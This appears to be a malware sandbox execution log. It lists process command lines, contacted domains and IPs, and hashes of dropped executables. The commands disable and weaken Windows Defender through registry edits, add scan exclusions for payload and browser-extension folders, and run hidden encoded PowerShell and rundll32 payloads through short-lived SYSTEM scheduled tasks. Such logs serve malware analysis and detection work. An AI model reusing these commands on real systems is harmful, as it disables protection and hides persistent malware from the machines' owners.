"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gMvUkTVLF" /SC once /ST 01:37:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gMvUkTVLF"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gMvUkTVLF"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "mRaseIvrfxDtBOYKW" /SC once /ST 10:59:43 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe\" Ty /Pisite_idaaw 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "mRaseIvrfxDtBOYKW"

C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe

C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe Ty /Pisite_idaaw 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bdnnguwcOLBYKAjbbA"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yvWovCiVU\jplHxo.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eGwAoTnpAObQfPU" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "eGwAoTnpAObQfPU2" /F /xml "C:\Program Files (x86)\yvWovCiVU\UnqLSRy.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "eGwAoTnpAObQfPU"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "eGwAoTnpAObQfPU"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ALvbXdfFiQJKEp" /F /xml "C:\Program Files (x86)\LCifMpYymZWU2\NANOZXe.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BIiSjOILpRnDn2" /F /xml "C:\ProgramData\WkkDuRgYrrqHXcVB\UlQFaef.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "uCAhUOuaRBfXDMltv2" /F /xml "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\tnLDIQD.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "cLzKLCJHWfKFSkdKasF2" /F /xml "C:\Program Files (x86)\mVqQIGUXDOgrC\feITmxR.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "FTXCzbcEvROqagNdd" /SC once /ST 11:38:10 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\IzRZTwSZebgYVSAl\SeazvxRp\pGucmuk.dll\",#1 /pvsite_idqjm 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "FTXCzbcEvROqagNdd"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\SeazvxRp\pGucmuk.dll",#1 /pvsite_idqjm 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\SeazvxRp\pGucmuk.dll",#1 /pvsite_idqjm 385118

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "FTXCzbcEvROqagNdd"

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "mRaseIvrfxDtBOYKW"

Network

Country Destination Domain Proto
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
US 188.114.97.2:443 shipofdestiny.com tcp
DE 185.172.128.144:80 185.172.128.144 tcp
RU 193.233.132.175:80 tcp
AT 5.42.64.17:80 5.42.64.17 tcp
US 8.8.8.8:53 sty.ink udp
US 8.8.8.8:53 cu82342.tw1.ru udp
US 8.8.8.8:53 namemail.org udp
US 8.8.8.8:53 net.geo.opera.com udp
US 104.21.13.170:443 sty.ink tcp
US 104.21.13.170:443 sty.ink tcp
US 104.21.15.5:443 operandotwo.com tcp
NL 185.26.182.111:80 net.geo.opera.com tcp
US 188.114.96.2:443 lawyerbuyer.org tcp
US 188.114.96.2:443 lawyerbuyer.org tcp
RU 176.57.210.144:443 cu82342.tw1.ru tcp
NL 185.26.182.111:443 net.geo.opera.com tcp
US 188.114.97.2:443 lawyerbuyer.org tcp
US 188.114.97.2:443 lawyerbuyer.org tcp
US 172.67.173.167:443 guseman.org tcp
DE 185.172.128.90:80 185.172.128.90 tcp
FR 95.164.45.22:443 d.392391234.xyz tcp
FR 95.164.45.22:443 d.392391234.xyz tcp
US 8.8.8.8:53 111.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 22.45.164.95.in-addr.arpa udp
US 8.8.8.8:53 144.210.57.176.in-addr.arpa udp
US 8.8.8.8:53 167.173.67.172.in-addr.arpa udp
DE 185.172.128.65:80 tcp
DE 185.172.128.65:80 tcp
US 8.8.8.8:53 herdbescuitinjurywu.shop udp
US 104.21.69.91:443 tcp
DE 185.172.128.144:80 tcp
DE 185.172.128.209:80 tcp
US 104.21.69.91:443 tcp
US 104.21.69.91:443 tcp
NL 82.145.216.20:443 tcp
NL 82.145.216.20:443 tcp
NL 82.145.217.121:443 tcp
US 104.21.69.91:443 tcp
US 104.18.11.89:443 tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
NL 185.26.182.117:443 tcp
US 8.8.8.8:53 904260d0-cc15-485d-9794-c8e6df526d0c.uuid.datadumpcloud.org udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 cdn.discordapp.com udp
CH 172.217.210.127:19302 stun4.l.google.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
BG 185.82.216.104:443 server1.datadumpcloud.org tcp
US 104.21.94.82:443 carsalessystem.com tcp
BG 185.82.216.104:443 server1.datadumpcloud.org tcp
NL 82.145.216.16:443 tcp
BG 185.82.216.104:443 server1.datadumpcloud.org tcp
US 8.8.8.8:53 udp
N/A 104.21.76.57:443 tcp
N/A 46.226.167.187:80 tcp
US 172.67.75.163:443 tcp
US 34.117.186.192:443 tcp
DE 185.172.128.65:80 tcp
US 3.80.150.121:443 service-domain.xyz tcp
GB 142.250.179.238:443 clients2.google.com tcp
GB 142.250.178.1:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 1.178.250.142.in-addr.arpa udp
GB 142.250.179.238:443 clients2.google.com tcp
US 44.240.147.44:80 api3.check-data.xyz tcp

Files

memory/4932-0-0x0000026F19630000-0x0000026F1963C000-memory.dmp

memory/4932-1-0x00007FF9263E0000-0x00007FF926EA2000-memory.dmp

memory/4932-2-0x0000026F1B3E0000-0x0000026F1B3F0000-memory.dmp

memory/4932-3-0x0000026F34AC0000-0x0000026F34B36000-memory.dmp

memory/4932-4-0x0000026F1B360000-0x0000026F1B37E000-memory.dmp

memory/4932-5-0x0000026F33DD0000-0x0000026F33E2E000-memory.dmp

memory/4932-6-0x0000026F1B3E0000-0x0000026F1B3F0000-memory.dmp

memory/4932-7-0x0000026F1B3E0000-0x0000026F1B3F0000-memory.dmp

memory/576-8-0x0000000000400000-0x0000000000408000-memory.dmp

memory/576-9-0x0000000074C30000-0x00000000753E1000-memory.dmp

memory/576-10-0x0000000005840000-0x0000000005850000-memory.dmp

memory/4932-11-0x00007FF9263E0000-0x00007FF926EA2000-memory.dmp

C:\Users\Admin\Pictures\1oFgcxPIGUVuycnjygIX7D3k.exe

MD5 5b423612b36cde7f2745455c5dd82577
SHA1 0187c7c80743b44e9e0c193e993294e3b969cc3d
SHA256 e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09
SHA512 c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c

C:\Users\Admin\Pictures\YTL0PmmS83SCp78qfDgfizjt.exe

MD5 9cd8f017fce108d15a3da05ad68dc88d
SHA1 8a934caca9bc4aae78caf22ffb40fa52d0539bd2
SHA256 41cfcd320e71a9703685c95859dec2262cc459c3a5d6d4e2e4379d8f9695c854
SHA512 bd6fbdab2e4a67f09afb5c88441410ff5efa567da2ae0089da210f68f79e87ac7b04da43e710ec4fcf25ceef28dc13bcdff6335f37e35017f6b0039c53c4dc5b

memory/3868-38-0x0000000000D80000-0x0000000000DEE000-memory.dmp

memory/3868-37-0x0000000000E20000-0x0000000000F20000-memory.dmp

memory/3868-39-0x0000000000400000-0x0000000000B0D000-memory.dmp

C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe

MD5 c4557771f0454d0924cff29fe81f2fb1
SHA1 905dfbc56726538788fde25dfc364509b220f3f3
SHA256 c8dba8d9f5446614284942a20ccc34a939be7ef2183f7da8e89ed4848a11cbaf
SHA512 5822384e112b7c92e1d0c2bf3d4b6017f0560c8f6fa0608881e7bd3f04acd8eab9a02df6ae8c13c22cd813aabbc6137cd27c0f72d847c0ac526a0fd7dd562e43

memory/1164-57-0x0000000002DD0000-0x00000000031CD000-memory.dmp

C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe

MD5 4add431a81cb545cfea57bbd47fc0a7d
SHA1 b3352a665e4ad3602602fa0ead723beab02d32ae
SHA256 1ceccedb81243395fda6d5fac63d746b431631f131690496522567081e4bb977
SHA512 be7dd55fd5832a1f31f1244a396b36ba9af9d0f9db83f571ef61651d70b1db9e2853094aa96cfce6ddd70276d20c46afd68cbd8a2882cf3f8572ee3845471420

memory/1164-65-0x00000000031D0000-0x0000000003ABB000-memory.dmp

memory/1164-81-0x0000000000400000-0x0000000000ECD000-memory.dmp

C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe

MD5 7960d8afbbac06f216cceeb1531093bb
SHA1 008221bf66a0749447cffcb86f2d1ec80e23fc76
SHA256 f6e476e8ccb571b9d7a76234953ad428e883ff4712b0062498ba3275d9749b84
SHA512 35d12e81eb892aeb2237049beca61a81469dea5b1c9b7a0b9f49fbf95a95c756509d9e76c732fb10b504f9f9692e1fbe83ea2fd09d791f793a928c01974b8147

memory/4996-83-0x0000000002BD0000-0x0000000002FCD000-memory.dmp

memory/3156-95-0x0000000000CB0000-0x0000000000D1E000-memory.dmp

memory/4996-100-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/4996-101-0x00000000030D0000-0x00000000039BB000-memory.dmp

C:\Users\Admin\Pictures\D5DiMuAoMYdqs3uIyHVh2vxp.exe

MD5 e2a6c1f58b137874e490b8d94382fcdb
SHA1 71529c5d708091b1e1a580227dc52e62a140edd1
SHA256 4801879a7afb9d03f7edcbe76cd9306cb024d80abc8512c4995aa97e8fd52437
SHA512 24d12ce668e5189a4ba80520a4eaf480d17d3a07d8d0d4312964968f8489143df225881ec70e39e0c62e381061626801ead72d70cea164e2c3870bfbd7bc4eff

memory/3156-113-0x0000000074C30000-0x00000000753E1000-memory.dmp

memory/4568-121-0x0000000002BB0000-0x0000000002FAC000-memory.dmp

memory/576-120-0x0000000074C30000-0x00000000753E1000-memory.dmp

memory/3752-123-0x0000000000E90000-0x0000000000F90000-memory.dmp

memory/3752-124-0x0000000002830000-0x000000000287A000-memory.dmp

memory/3208-122-0x0000000000400000-0x000000000046D000-memory.dmp

memory/3208-128-0x0000000000400000-0x000000000046D000-memory.dmp

memory/3752-129-0x0000000000400000-0x0000000000B06000-memory.dmp

memory/3752-130-0x0000000000E70000-0x0000000000E71000-memory.dmp

memory/3868-131-0x0000000000E20000-0x0000000000F20000-memory.dmp

memory/3156-115-0x0000000005640000-0x0000000005650000-memory.dmp

memory/3156-132-0x0000000003060000-0x0000000005060000-memory.dmp

memory/576-133-0x0000000005840000-0x0000000005850000-memory.dmp

memory/4568-134-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/3208-135-0x0000000000400000-0x000000000046D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe

MD5 ab1dbed7cd6c1bf01ab77d12d1b86cd8
SHA1 ccfd0f691e8e75ed0fb9a436032167cc633ce68b
SHA256 b5389bf868f62fcbdebccd4a8014ab6b3c0164de09913f34d6fa18f36cbcb1a5
